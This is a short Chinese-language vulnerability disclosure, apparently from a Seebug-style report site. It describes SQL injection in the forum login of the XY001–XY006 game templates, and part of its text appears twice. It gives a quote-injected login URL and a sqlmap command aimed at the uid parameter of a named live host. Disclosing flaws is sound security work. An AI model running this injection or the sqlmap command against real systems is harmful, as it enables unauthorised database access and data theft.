### 简要描述: 从XY001到XY006游戏模板均存在此SQL注入 ### 详细说明: 游戏模板玩家论坛登录处未正确处理用户输入导致SQL注入: 以其中一个商业游戏模板测试: ``` http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test%27&pwd=adfadsf&rem=false ``` [<img src="https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg) 测试: ``` sqlmap.py -u "http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test&pwd=adfadsf&rem=false" -p "uid" ``` [<img src="https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg) tables: [<img...
### 简要描述: 从XY001到XY006游戏模板均存在此SQL注入 ### 详细说明: 游戏模板玩家论坛登录处未正确处理用户输入导致SQL注入: 以其中一个商业游戏模板测试: ``` http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test%27&pwd=adfadsf&rem=false ``` [<img src="https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg) 测试: ``` sqlmap.py -u "http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test&pwd=adfadsf&rem=false" -p "uid" ``` [<img src="https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg) tables: [<img src="https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg" alt="sqltest22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/14172107863fda723245f11e3f261bfd20937c40.jpg) [<img src="https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg" alt="sqltest4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1417241743fe87b21ca1291f9894e327bc71d3ef.jpg) [<img src="https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg" alt="sqltest22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/141727564c0fd9412165724d8e08c290ae2964c3.jpg)